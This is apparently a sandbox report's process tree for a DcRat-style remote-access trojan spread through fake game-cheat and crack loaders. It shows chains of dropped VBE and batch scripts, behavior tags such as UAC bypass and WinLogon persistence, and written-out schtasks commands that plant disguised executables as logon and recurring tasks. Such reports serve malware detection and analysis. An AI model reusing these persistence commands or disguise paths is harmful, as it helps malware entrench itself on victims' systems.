C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"32⤵
- Suspicious use of AdjustPrivilegeToken
PID:5012 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"29⤵PID:7744
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"28⤵
- Executes dropped EXE
PID:3408 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"29⤵PID:3508
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "30⤵PID:4728
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"31⤵
- Suspicious use of AdjustPrivilegeToken
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"27⤵
- Executes dropped EXE
PID:3276 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"28⤵PID:3372
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "29⤵PID:4696
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"30⤵
- Suspicious use of AdjustPrivilegeToken
PID:5040 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"27⤵PID:6700
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"26⤵
- Executes dropped EXE
PID:3236 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"27⤵PID:3400
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "28⤵PID:4684
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"29⤵
- Suspicious use of AdjustPrivilegeToken
PID:5020 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"26⤵PID:7684
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"25⤵
- Executes dropped EXE
PID:536 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"26⤵PID:3252
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "27⤵PID:4712
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"28⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"24⤵
- Executes dropped EXE
PID:2152 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"25⤵PID:2000
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "26⤵PID:3236
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"27⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"24⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"23⤵
- Executes dropped EXE
PID:348 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"24⤵PID:2360
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "25⤵PID:3676
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"26⤵
- Suspicious use of AdjustPrivilegeToken
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"23⤵PID:7624
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"22⤵
- Executes dropped EXE
PID:1028 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"23⤵PID:1696
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "24⤵PID:3576
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"25⤵
- Suspicious use of AdjustPrivilegeToken
PID:3352 -
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"21⤵
- Executes dropped EXE
PID:2068 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"22⤵PID:1988
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "23⤵PID:1724
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"24⤵
- Suspicious use of AdjustPrivilegeToken
PID:3348 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"21⤵PID:2540
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"20⤵
- Executes dropped EXE
PID:2484 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"21⤵PID:2520
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "22⤵PID:3868
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"23⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"19⤵
- Executes dropped EXE
PID:1960 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"20⤵PID:2780
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "21⤵PID:3876
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"22⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"19⤵PID:7700
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"18⤵
- Executes dropped EXE
PID:2224 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"19⤵PID:1588
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "20⤵PID:3768
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"21⤵
- Suspicious use of AdjustPrivilegeToken
PID:3360 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"18⤵PID:4844
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"17⤵
- Executes dropped EXE
PID:1804 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"18⤵PID:3032
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "19⤵PID:3700
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"20⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"17⤵PID:7836
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"16⤵
- Executes dropped EXE
PID:1696 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"17⤵PID:1584
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "18⤵PID:3812
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"19⤵
- Suspicious use of AdjustPrivilegeToken
PID:4012 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"16⤵PID:6564
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"15⤵
- Executes dropped EXE
PID:1508 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"16⤵PID:3024
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "17⤵PID:3660
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"18⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"15⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"14⤵
- Executes dropped EXE
PID:1812 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"15⤵PID:1564
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "16⤵PID:3616
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"17⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"14⤵PID:3460
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"13⤵
- Executes dropped EXE
PID:1348 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"14⤵PID:2132
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "15⤵PID:3856
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"16⤵
- Suspicious use of AdjustPrivilegeToken
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"13⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"12⤵
- Executes dropped EXE
PID:2312 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"13⤵PID:3000
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "14⤵
- Loads dropped DLL
PID:2612 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"11⤵
- Executes dropped EXE
PID:2024 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"12⤵PID:2908
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "13⤵PID:3632
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"14⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"11⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"10⤵
- Executes dropped EXE
PID:1856 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"11⤵PID:408
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "12⤵
- Loads dropped DLL
PID:1984 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"10⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"9⤵
- Executes dropped EXE
PID:2872 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"10⤵PID:2168
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "11⤵
- Loads dropped DLL
PID:2292 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2388 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"9⤵PID:6436
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"8⤵
- Executes dropped EXE
PID:2520 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"9⤵PID:1660
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "10⤵
- Loads dropped DLL
PID:2396 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"11⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uyZu8tDpxN.bat"12⤵PID:2596
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:213⤵PID:3712
-
C:\Users\Public\reviewNet.exe"C:\Users\Public\reviewNet.exe"13⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"8⤵PID:5732
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"7⤵
- Executes dropped EXE
PID:1492 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"8⤵PID:2184
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "9⤵
- Loads dropped DLL
PID:1860 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"10⤵
- DcRat
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2248 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oInhkeZCvT.bat"11⤵PID:5548
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:212⤵PID:1608
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:7152 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"7⤵PID:7212
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"6⤵
- Executes dropped EXE
PID:2396 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"7⤵PID:2260
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "8⤵
- Loads dropped DLL
PID:636 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"6⤵PID:6276
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"6⤵PID:3008
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "7⤵
- Loads dropped DLL
PID:880 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"8⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Kn8TuT8p8X.bat"9⤵PID:4572
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:210⤵PID:6852
-
C:\ComsurrogateServerdll\CrackLauncher.exe"C:\ComsurrogateServerdll\CrackLauncher.exe"10⤵PID:4648
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"4⤵
- Executes dropped EXE
PID:2692 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"5⤵PID:3016
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "6⤵
- Loads dropped DLL
PID:2688 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"7⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Endr4g1tEq.bat"8⤵PID:2140
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:7144
-
C:\Users\Admin\Desktop\conhost.exe"C:\Users\Admin\Desktop\conhost.exe"9⤵PID:948
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"3⤵
- Executes dropped EXE
PID:2944 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"4⤵PID:2440
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "5⤵
- Loads dropped DLL
PID:2312 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"6⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2636 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b93nLTpSQp.bat"7⤵PID:6408
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:6676
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe"C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe"8⤵PID:5552
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"3⤵PID:4024
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"2⤵
- Executes dropped EXE
PID:2148 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"3⤵PID:2616
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "4⤵
- Loads dropped DLL
PID:2736 -
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"2⤵PID:7648
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1406878062102850843-1804211736-1324494858-1767034057-1667410540258605708-2105403979"1⤵PID:2068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-744146261742772594497901711-1763802217-1597581060-17897338994804635431460189342"1⤵PID:1812
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-857903594135187414-1080223752-1408395248685007522-1248151200-18162985291718858552"1⤵PID:3032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4304
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:4128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:4796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Desktop\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:3984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\Desktop\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Desktop\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3256
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:4292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3472
-
